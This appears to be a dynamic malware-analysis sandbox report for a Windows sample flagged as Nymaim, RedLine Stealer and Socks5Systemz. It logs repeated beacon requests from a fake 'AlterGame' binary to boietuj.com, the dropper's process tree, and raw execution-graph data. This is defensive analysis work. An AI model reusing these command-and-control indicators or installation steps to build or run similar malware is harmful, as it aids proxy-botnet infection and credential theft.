                                                                47192.168.2.450051185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:06.375147104 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:07.074831009 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.450052185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:07.203347921 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:07.930809975 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:07 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.450053185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:08.056974888 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:08.770709991 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:04:08.878520012 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:09.241702080 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.450054185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:09.369337082 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:10.097054958 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:04:10.206680059 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:10.464906931 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.450055185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:10.588433981 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:11.292295933 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.450056185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:12.356204033 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:13.148518085 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.450057185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:13.274492979 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:13.978082895 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.450058185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:14.103496075 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:14.830722094 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:04:14.945848942 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:15.203723907 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.450059185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:15.321496964 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:16.026043892 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                56192.168.2.450060185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:16.150794029 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:16.852190971 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                57192.168.2.450061185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:04:16.977709055 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:17.704370022 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:23:02:12
                                                                Start date:19/11/2024
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                Imagebase:0x400000
                                                                File size:438'784 bytes
                                                                MD5 hash:5237853DBEBAEFB1DFA86130DD1D39FA
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:1
                                                                Start time:23:02:12
                                                                Start date:19/11/2024
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                Imagebase:0x400000
                                                                File size:438'784 bytes
                                                                MD5 hash:5237853DBEBAEFB1DFA86130DD1D39FA
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:23:02:21
                                                                Start date:19/11/2024
                                                                Path:C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe"
                                                                Imagebase:0x400000
                                                                File size:4'065'622 bytes
                                                                MD5 hash:98C5D582966DD7E46FF73E7D6D62B87D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                General

                                                                Target ID:3
                                                                Start time:23:02:21
                                                                Start date:19/11/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp" /SL5="$403E6,3817417,54272,C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe"
                                                                Imagebase:0x400000
                                                                File size:704'000 bytes
                                                                MD5 hash:62FDBBA6364B54BBE42B437284A2963C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 3%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:false

                                                                General

                                                                Target ID:4
                                                                Start time:23:02:23
                                                                Start date:19/11/2024
                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\system32\net.exe" pause alter_game_11196
                                                                Imagebase:0x50000
                                                                File size:47'104 bytes
                                                                MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:23:02:24
                                                                Start date:19/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:23:02:24
                                                                Start date:19/11/2024
                                                                Path:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe" -i
                                                                Imagebase:0x400000
                                                                File size:4'255'772 bytes
                                                                MD5 hash:C1DEEF6663EFF952E8990193B3452A2F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.3048714500.0000000002D95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:false

                                                                General

                                                                Target ID:7
                                                                Start time:23:02:24
                                                                Start date:19/11/2024
                                                                Path:C:\Windows\SysWOW64\net1.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\net1 pause alter_game_11196
                                                                Imagebase:0x170000
                                                                File size:139'776 bytes
                                                                MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:23:02:24
                                                                Start date:19/11/2024
                                                                Path:C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe"
                                                                Imagebase:0x8f0000
                                                                File size:4'608 bytes
                                                                MD5 hash:F328A95046E3A2514C36347EAEC911C0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 54%, ReversingLabs
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:3.8%
                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                  Signature Coverage:7.7%
                                                                  Total number of Nodes:1346
                                                                  Total number of Limit Nodes:36
                                                                  execution_graph 19291 40b5d3 19294 40b438 19291->19294 19293 40b5e2 19295 40b444 __mtinitlocknum 19294->19295 19325 408ca0 19295->19325 19299 40b457 19346 40b1d7 19299->19346 19304 40b597 __mtinitlocknum 19304->19293 19307 40b5a4 19307->19304 19312 40b5b7 19307->19312 19313 407e83 ___freetlocinfo 67 API calls 19307->19313 19308 40b4a8 InterlockedDecrement 19309 40b4b8 19308->19309 19310 40b4c9 InterlockedIncrement 19308->19310 19309->19310 19369 407e83 19309->19369 19310->19304 19311 40b4df 19310->19311 19311->19304 19382 40656d 19311->19382 19392 405968 19312->19392 19313->19312 19316 40b4c8 19316->19310 19318 40b4f3 InterlockedDecrement 19320 40b582 InterlockedIncrement 19318->19320 19321 40b56f 19318->19321 19389 40b599 19320->19389 19321->19320 19323 407e83 ___freetlocinfo 67 API calls 19321->19323 19324 40b581 19323->19324 19324->19320 19395 408c27 GetLastError 19325->19395 19327 408ca8 19328 408cb5 19327->19328 19410 406fd0 19327->19410 19330 40b133 19328->19330 19331 40b13f __mtinitlocknum 19330->19331 19332 408ca0 __getptd 67 API calls 19331->19332 19333 40b144 19332->19333 19334 40656d __lock 67 API calls 19333->19334 19336 40b156 19333->19336 19335 40b174 19334->19335 19338 40b1bd 19335->19338 19341 40b1a5 InterlockedIncrement 19335->19341 19342 40b18b InterlockedDecrement 19335->19342 19337 40b164 __mtinitlocknum 19336->19337 19339 406fd0 __amsg_exit 67 API calls 19336->19339 19337->19299 19655 40b1ce 19338->19655 19339->19337 19341->19338 19342->19341 19343 40b196 19342->19343 19343->19341 19344 407e83 ___freetlocinfo 67 API calls 19343->19344 19345 40b1a4 19344->19345 19345->19341 19659 40693c 19346->19659 19349 40b214 19351 40b219 GetACP 19349->19351 19352 40b206 19349->19352 19350 40b1f6 GetOEMCP 19350->19352 19351->19352 19352->19304 19353 40aaee 19352->19353 19354 40aaf7 19353->19354 19356 40ab2d 19354->19356 19357 40ab0e Sleep 19354->19357 19850 40d900 19354->19850 19356->19304 19359 40b253 19356->19359 19358 40ab23 19357->19358 19358->19354 19358->19356 19360 40b1d7 getSystemCP 79 API calls 19359->19360 19361 40b273 19360->19361 19362 40b27e setSBCS 19361->19362 19365 40b2c2 IsValidCodePage 19361->19365 19367 40b2e7 _memset __setmbcp_nolock 19361->19367 19363 407750 __invoke_watson 5 API calls 19362->19363 19364 40b436 19363->19364 19364->19307 19364->19308 19365->19362 19366 40b2d4 GetCPInfo 19365->19366 19366->19362 19366->19367 19886 40afa0 GetCPInfo 19367->19886 19371 407e8f __mtinitlocknum 19369->19371 19370 407ece 19372 407f08 __dosmaperr __mtinitlocknum 19370->19372 19373 407ee3 HeapFree 19370->19373 19371->19370 19371->19372 19374 40656d __lock 65 API calls 19371->19374 19372->19316 19373->19372 19375 407ef5 19373->19375 19377 407ea6 ___sbh_find_block 19374->19377 19376 405968 _strcat_s 65 API calls 19375->19376 19378 407efa GetLastError 19376->19378 19379 407ec0 19377->19379 20038 409ad2 19377->20038 19378->19372 20045 407ed9 19379->20045 19383 406582 19382->19383 19384 406595 EnterCriticalSection 19382->19384 20053 4064aa 19383->20053 19384->19318 19386 406588 19386->19384 19387 406fd0 __amsg_exit 66 API calls 19386->19387 19388 406594 19387->19388 19388->19384 20088 406493 LeaveCriticalSection 19389->20088 19391 40b5a0 19391->19304 19393 408c27 __getptd_noexit 67 API calls 19392->19393 19394 40596d 19393->19394 19394->19304 19417 408acf TlsGetValue 19395->19417 19398 408c94 SetLastError 19398->19327 19401 408c5a 19428 408a54 TlsGetValue 19401->19428 19404 408c73 19438 408b40 19404->19438 19405 408c8b 19406 407e83 ___freetlocinfo 64 API calls 19405->19406 19408 408c91 19406->19408 19408->19398 19409 408c7b GetCurrentThreadId 19409->19398 19521 407717 19410->19521 19415 408a54 __decode_pointer 6 API calls 19416 406fed 19415->19416 19416->19328 19418 408ae4 19417->19418 19419 408aff 19417->19419 19420 408a54 __decode_pointer 6 API calls 19418->19420 19419->19398 19422 40ab33 19419->19422 19421 408aef TlsSetValue 19420->19421 19421->19419 19424 40ab3c 19422->19424 19425 408c52 19424->19425 19426 40ab5a Sleep 19424->19426 19456 4059b1 19424->19456 19425->19398 19425->19401 19427 40ab6f 19426->19427 19427->19424 19427->19425 19429 408a6c 19428->19429 19430 408a8d GetModuleHandleW 19428->19430 19429->19430 19431 408a76 TlsGetValue 19429->19431 19432 408aa8 GetProcAddress 19430->19432 19433 408a9d 19430->19433 19436 408a81 19431->19436 19435 408a85 19432->19435 19496 406fa0 19433->19496 19435->19404 19435->19405 19436->19430 19436->19435 19500 406750 19438->19500 19440 408b4c GetModuleHandleW 19441 408b5c 19440->19441 19445 408b62 19440->19445 19442 406fa0 __crt_waiting_on_module_handle 2 API calls 19441->19442 19442->19445 19443 408b7a GetProcAddress GetProcAddress 19444 408b9e 19443->19444 19446 40656d __lock 63 API calls 19444->19446 19445->19443 19445->19444 19447 408bbd InterlockedIncrement 19446->19447 19501 408c15 19447->19501 19450 40656d __lock 63 API calls 19451 408bde 19450->19451 19504 40b739 InterlockedIncrement 19451->19504 19453 408bfc 19516 408c1e 19453->19516 19455 408c09 __mtinitlocknum 19455->19409 19457 4059bd __mtinitlocknum 19456->19457 19458 4059d5 19457->19458 19468 4059f4 _memset 19457->19468 19459 405968 _strcat_s 66 API calls 19458->19459 19460 4059da 19459->19460 19469 4081e2 19460->19469 19461 405a66 HeapAlloc 19461->19468 19463 4059ea __mtinitlocknum 19463->19424 19465 40656d __lock 66 API calls 19465->19468 19468->19461 19468->19463 19468->19465 19472 40a281 19468->19472 19478 405aad 19468->19478 19481 409a7a 19468->19481 19470 408a54 __decode_pointer 6 API calls 19469->19470 19471 4081f2 __invoke_watson 19470->19471 19475 40a2af 19472->19475 19473 40a348 19477 40a351 19473->19477 19491 409e98 19473->19491 19475->19473 19475->19477 19484 409de8 19475->19484 19477->19468 19495 406493 LeaveCriticalSection 19478->19495 19480 405ab4 19480->19468 19482 408a54 __decode_pointer 6 API calls 19481->19482 19483 409a8a 19482->19483 19483->19468 19485 409dfb HeapReAlloc 19484->19485 19486 409e2f HeapAlloc 19484->19486 19487 409e1d 19485->19487 19489 409e19 19485->19489 19488 409e52 VirtualAlloc 19486->19488 19486->19489 19487->19486 19488->19489 19490 409e6c HeapFree 19488->19490 19489->19473 19490->19489 19492 409eaf VirtualAlloc 19491->19492 19494 409ef6 19492->19494 19494->19477 19495->19480 19497 406fab Sleep GetModuleHandleW 19496->19497 19498 406fc9 19497->19498 19499 406fcd 19497->19499 19498->19497 19498->19499 19499->19432 19499->19435 19500->19440 19519 406493 LeaveCriticalSection 19501->19519 19503 408bd7 19503->19450 19505 40b757 InterlockedIncrement 19504->19505 19506 40b75a 19504->19506 19505->19506 19507 40b764 InterlockedIncrement 19506->19507 19508 40b767 19506->19508 19507->19508 19509 40b771 InterlockedIncrement 19508->19509 19510 40b774 19508->19510 19509->19510 19511 40b77e InterlockedIncrement 19510->19511 19513 40b781 19510->19513 19511->19513 